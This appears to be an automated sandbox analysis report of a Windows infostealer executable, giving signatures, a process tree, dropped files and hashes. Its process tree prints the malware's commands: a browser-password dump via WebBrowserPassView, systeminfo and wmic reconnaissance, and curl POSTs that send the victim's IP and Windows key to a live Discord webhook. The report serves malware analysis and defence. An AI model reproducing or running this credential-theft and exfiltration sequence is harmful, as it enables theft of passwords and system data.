Analysis

  • max time kernel
    47s
  • max time network
    112s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    21-03-2021 18:51

General

  • Target

    460c76892a939c1b7d563171c3b2d349.exe

  • Size

    10KB

  • MD5

    460c76892a939c1b7d563171c3b2d349

  • SHA1

    267857f6c93b33f87c7d3fd109d22fe3e7e33913

  • SHA256

    6851d9ae6d9c3405a7fb92d93ec0bd87e3c52a6903e29ab55f2d7b779559d4b7

  • SHA512

    f2e559032b4d8cdcd020e5b62fbdbe163fabe9af0c1f518eb0b33881c491c0a545297d2403a488dae752703d94ce5afa66fbfa63901bf875a5d2c0b9eee1d0ea

Score
9/10

Malware Config

Signatures

  • NirSoft WebBrowserPassView 2 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • Gathers system information 1 TTPs 8 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\460c76892a939c1b7d563171c3b2d349.exe
    "C:\Users\Admin\AppData\Local\Temp\460c76892a939c1b7d563171c3b2d349.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:988
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\temp\finalres.vbs"
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3756
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\temp\finalres2.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:648
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\temp\finalres.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:188
          • C:\temp\curl.exe
            C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**Hey Machos. Extraction was successful.**\"}" https://discordapp.com/api/webhooks/812010029556432946/cR78AVIHBOdzVZKLTZyxTYPyO8Zxl7AHlImj-qXIF6Ue767lT1m1Gsek0tpc8FRIm7sC
            5⤵
            • Executes dropped EXE
            PID:504
          • C:\temp\curl.exe
            C:/temp/curl "https://myexternalip.com/raw"
            5⤵
            • Executes dropped EXE
            PID:296
          • C:\temp\WebBrowserPassView.exe
            C:/temp/WebBrowserPassView.exe /stext "C:/temp/Admin_Passwords.txt"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:2876
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            5⤵
            • Gathers system information
            PID:2252
          • C:\Windows\system32\findstr.exe
            findstr /c:"Host Name"
            5⤵
              PID:1132
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              5⤵
              • Gathers system information
              PID:184
            • C:\Windows\system32\findstr.exe
              findstr /c:"Domain"
              5⤵
                PID:3676
              • C:\Windows\system32\systeminfo.exe
                systeminfo
                5⤵
                • Gathers system information
                PID:1896
              • C:\Windows\system32\findstr.exe
                findstr /c:"OS Name"
                5⤵
                  PID:1296
                • C:\Windows\system32\systeminfo.exe
                  systeminfo
                  5⤵
                  • Gathers system information
                  PID:1372
                • C:\Windows\system32\findstr.exe
                  findstr /c:"OS Version"
                  5⤵
                    PID:2100
                  • C:\Windows\system32\systeminfo.exe
                    systeminfo
                    5⤵
                    • Gathers system information
                    PID:3416
                  • C:\Windows\system32\findstr.exe
                    findstr /c:"System Manufacturer"
                    5⤵
                      PID:692
                    • C:\Windows\system32\systeminfo.exe
                      systeminfo
                      5⤵
                      • Gathers system information
                      PID:2500
                    • C:\Windows\system32\findstr.exe
                      findstr /c:"System Model"
                      5⤵
                        PID:3040
                      • C:\Windows\system32\systeminfo.exe
                        systeminfo
                        5⤵
                        • Gathers system information
                        PID:2968
                      • C:\Windows\system32\findstr.exe
                        findstr /c:"System type"
                        5⤵
                          PID:3044
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          5⤵
                          • Gathers system information
                          PID:1204
                        • C:\Windows\system32\findstr.exe
                          findstr /c:"Total Physical Memory"
                          5⤵
                            PID:3180
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic diskdrive get size
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:728
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic bios get serialnumber
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:512
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic cpu get name
                            5⤵
                              PID:2652
                            • C:\temp\curl.exe
                              C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**Admin**\n```asciidoc\nTime and Date :: Sun 03/21/2021 18:55:19.04\nIP Address :: 154.61.71.51\nWindows Info :: Product Name: Windows 10 Pro, Product ID: 00331-10000-00001-AA505, Installed Key: W269N-WFGWX-YVC9B-4J6C9-T83GX\n```\n\"}" https://discordapp.com/api/webhooks/812010029556432946/cR78AVIHBOdzVZKLTZyxTYPyO8Zxl7AHlImj-qXIF6Ue767lT1m1Gsek0tpc8FRIm7sC
                              5⤵
                              • Executes dropped EXE
                              PID:2964
                            • C:\temp\filed.exe
                              "C:\temp\filed.exe" --processStart filed.exe
                              5⤵
                              • Executes dropped EXE
                              PID:1896
                            • C:\Windows\system32\timeout.exe
                              timeout 5
                              5⤵
                              • Delays execution with timeout.exe
                              PID:3168

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\temp\Admin_Passwords.txt

                      MD5

                      1e69b6d630e694119f4f8c448a430b60

                      SHA1

                      b118feca7d85ec706b54279a1dafc71673fe6e54

                      SHA256

                      2f7eedbe9e3b0a3aa08df4fa2dc27de189484a8da8925cc6056513d744b7c00e

                      SHA512

                      19924161f75cbbcf7bdf122f3aecb43d813186a6693413ccc15bb2945d48401c8f058edf034cc641cedc97ae5e328d88fabfab1b5f324014b83671b3ebd78822

                    • C:\temp\System_INFO.txt

                      MD5

                      a0db502b560752fe48d6e306e234b4d2

                      SHA1

                      21ada8b0e0ef785b4db08d006d36a6593871128d

                      SHA256

                      f3572301f949b569f2f6e844b36932031830c83f08e044b21d785de6105b055d

                      SHA512

                      e9f85c3ed0e2ca656f9d266c6d082793949567e309ec4c42a9c8194c397f666235a4cbc18ffddb08e777d9ca63c6e886fb49fee4ceb296396ba6073993cde894

                    • C:\temp\WebBrowserPassView.exe

                      MD5

                      053778713819beab3df309df472787cd

                      SHA1

                      99c7b5827df89b4fafc2b565abed97c58a3c65b8

                      SHA256

                      f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe

                      SHA512

                      35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

                    • C:\temp\WebBrowserPassView.exe

                      MD5

                      053778713819beab3df309df472787cd

                      SHA1

                      99c7b5827df89b4fafc2b565abed97c58a3c65b8

                      SHA256

                      f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe

                      SHA512

                      35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

                    • C:\temp\WindowsInfo.txt

                      MD5

                      19b99491c9a650e8a96239ecab3af43e

                      SHA1

                      4216f0029e06616dd6dfd08ce3be92cde3fdadf2

                      SHA256

                      70b68853dc43e8e3338ee2ee31a833feb597976f9987986095733aa11aa53977

                      SHA512

                      f6ca180a7a547160f085d341b9ee0e88b73c58ccbc16e3bf82f3b4363ed41fdf5c05227a1f9fbd62adea04cbf748fb394aa28bfc7935ef7e9c0afb8c5b68cc7d

                    • C:\temp\curl-ca-bundle.crt

                      MD5

                      18c68c9898be980227f33c213a2464aa

                      SHA1

                      1057b838cf913c5e188e6ec6697b6f2b49637c29

                      SHA256

                      2782f0f8e89c786f40240fc1916677be660fb8d8e25dede50c9f6f7b0c2c2178

                      SHA512

                      0d49bd1435a25b113a34ac38b337a9c904b6ac720824fd55d410ff6d8f6d0f637b54fd92cdff31d1c632b6a77f35fe55de9c756f35365387cea94f0fd93631b1

                    • C:\temp\curl.exe

                      MD5

                      bb6cc0e0542d55d28c9a1bbb32253f76

                      SHA1

                      3033ddcf0ca904198922329d5e3a4bb03eb1e625

                      SHA256

                      2bbd7b9dd041c4d84a451033b257d7db2f23e6475f2e5d6e085e2e6f89043338

                      SHA512

                      073770b356a9e35f2e0ce3ab5fe4c68c72c368782744111c4603b1620633b9fe7b9d8fe8e8b0747164ad1e8e498ded61ff2b184779ee41e69a1210c24a381996

                    • C:\temp\curl.exe

                      MD5

                      bb6cc0e0542d55d28c9a1bbb32253f76

                      SHA1

                      3033ddcf0ca904198922329d5e3a4bb03eb1e625

                      SHA256

                      2bbd7b9dd041c4d84a451033b257d7db2f23e6475f2e5d6e085e2e6f89043338

                      SHA512

                      073770b356a9e35f2e0ce3ab5fe4c68c72c368782744111c4603b1620633b9fe7b9d8fe8e8b0747164ad1e8e498ded61ff2b184779ee41e69a1210c24a381996

                    • C:\temp\curl.exe

                      MD5

                      bb6cc0e0542d55d28c9a1bbb32253f76

                      SHA1

                      3033ddcf0ca904198922329d5e3a4bb03eb1e625

                      SHA256

                      2bbd7b9dd041c4d84a451033b257d7db2f23e6475f2e5d6e085e2e6f89043338

                      SHA512

                      073770b356a9e35f2e0ce3ab5fe4c68c72c368782744111c4603b1620633b9fe7b9d8fe8e8b0747164ad1e8e498ded61ff2b184779ee41e69a1210c24a381996

                    • C:\temp\curl.exe

                      MD5

                      bb6cc0e0542d55d28c9a1bbb32253f76

                      SHA1

                      3033ddcf0ca904198922329d5e3a4bb03eb1e625

                      SHA256

                      2bbd7b9dd041c4d84a451033b257d7db2f23e6475f2e5d6e085e2e6f89043338

                      SHA512

                      073770b356a9e35f2e0ce3ab5fe4c68c72c368782744111c4603b1620633b9fe7b9d8fe8e8b0747164ad1e8e498ded61ff2b184779ee41e69a1210c24a381996

                    • C:\temp\filed.exe

                      MD5

                      a8e9c1fbd1020c06552277742bd56767

                      SHA1

                      9bdb692f5822941f4841847dfc1e2756ddad7197

                      SHA256

                      a9ed81c4185ccc3ad9f437fa1cd775cb7d42fc6be6beaf9b956b77666e3b531c

                      SHA512

                      d431e3f1e4c5150cfee287053f3e238883b589f9145a4737a1c6fe929e9b18664af3aa7b566c208fc47b38bbc7d1fdb6fdc780011b651783b9072a672483a7b2

                    • C:\temp\filed.exe

                      MD5

                      a8e9c1fbd1020c06552277742bd56767

                      SHA1

                      9bdb692f5822941f4841847dfc1e2756ddad7197

                      SHA256

                      a9ed81c4185ccc3ad9f437fa1cd775cb7d42fc6be6beaf9b956b77666e3b531c

                      SHA512

                      d431e3f1e4c5150cfee287053f3e238883b589f9145a4737a1c6fe929e9b18664af3aa7b566c208fc47b38bbc7d1fdb6fdc780011b651783b9072a672483a7b2

                    • C:\temp\finalres.bat

                      MD5

                      ef10ccafd9271bef8d1162857d6c2182

                      SHA1

                      fa0216a96d015cb29c8014dd889cbb4f98146f71

                      SHA256

                      85f1898ca67d99c190bb5c1637727f7d82b41fe0ce8fb8351981efd2a582e91a

                      SHA512

                      28c88b0f84467abe45d567af555a71617a16c3bf462910582a5ed2f182de84fa0ffd88aa04207765ed02d4c5a8d76eec808235f7f8f9c1ddea777119fca9347c

                    • C:\temp\finalres.vbs

                      MD5

                      c8c6b64b81a851311e99d91724496dc3

                      SHA1

                      84dfd037612c878930263d02ecab16814ef47bf5

                      SHA256

                      f76ba0c9cc7614a11a7e1217e2e738196d6da56dec9c96f90a8a64d9f80a4493

                      SHA512

                      be6c21ab467e5d0e903c57bab8000edcaf21fc9e4795974a8df0fd6c9d398d8dac449b16bbb8b0cf6fe5ca8d7a8567d566d807ad27dbaebd26519eab91e19798

                    • C:\temp\finalres2.vbs

                      MD5

                      979ba252e2c4e3a386da68ff50fc9d0f

                      SHA1

                      b8fce3dd4ff22aa2fa909c9992cdbddbdc2ffdc8

                      SHA256

                      04084885435b6134e792c03f8b52bf6ea7135c7bd7ff8d3cc3aaedae2c667dae

                      SHA512

                      40a35d0eb276e6983d38fc4469308e6d755507732835a8425e277e623ea4d1c42b4e6a20d6d8a68e82fdc35a8e8754139a440cf380d2520b48af1d4640373de2

                    • memory/184-23-0x0000000000000000-mapping.dmp

                    • memory/188-11-0x0000000000000000-mapping.dmp

                    • memory/296-15-0x0000000000000000-mapping.dmp

                    • memory/504-12-0x0000000000000000-mapping.dmp

                    • memory/512-38-0x0000000000000000-mapping.dmp

                    • memory/648-9-0x0000000000000000-mapping.dmp

                    • memory/692-30-0x0000000000000000-mapping.dmp

                    • memory/728-37-0x0000000000000000-mapping.dmp

                    • memory/988-3-0x000001D9C0AA0000-0x000001D9C0AA1000-memory.dmp

                      Filesize

                      4KB

                    • memory/988-2-0x00007FFA14A00000-0x00007FFA153EC000-memory.dmp

                      Filesize

                      9.9MB

                    • memory/988-5-0x000001D9DB830000-0x000001D9DB832000-memory.dmp

                      Filesize

                      8KB

                    • memory/1132-21-0x0000000000000000-mapping.dmp

                    • memory/1204-35-0x0000000000000000-mapping.dmp

                    • memory/1296-26-0x0000000000000000-mapping.dmp

                    • memory/1372-27-0x0000000000000000-mapping.dmp

                    • memory/1896-45-0x0000000073310000-0x00000000739FE000-memory.dmp

                      Filesize

                      6.9MB

                    • memory/1896-42-0x0000000000000000-mapping.dmp

                    • memory/1896-46-0x00000000002C0000-0x00000000002C1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1896-25-0x0000000000000000-mapping.dmp

                    • memory/1896-48-0x0000000004D00000-0x0000000004D01000-memory.dmp

                      Filesize

                      4KB

                    • memory/2100-28-0x0000000000000000-mapping.dmp

                    • memory/2252-20-0x0000000000000000-mapping.dmp

                    • memory/2500-31-0x0000000000000000-mapping.dmp

                    • memory/2652-39-0x0000000000000000-mapping.dmp

                    • memory/2876-18-0x0000000000000000-mapping.dmp

                    • memory/2964-40-0x0000000000000000-mapping.dmp

                    • memory/2968-33-0x0000000000000000-mapping.dmp

                    • memory/3040-32-0x0000000000000000-mapping.dmp

                    • memory/3044-34-0x0000000000000000-mapping.dmp

                    • memory/3168-51-0x0000000000000000-mapping.dmp

                    • memory/3180-36-0x0000000000000000-mapping.dmp

                    • memory/3416-29-0x0000000000000000-mapping.dmp

                    • memory/3676-24-0x0000000000000000-mapping.dmp

                    • memory/3756-6-0x0000000000000000-mapping.dmp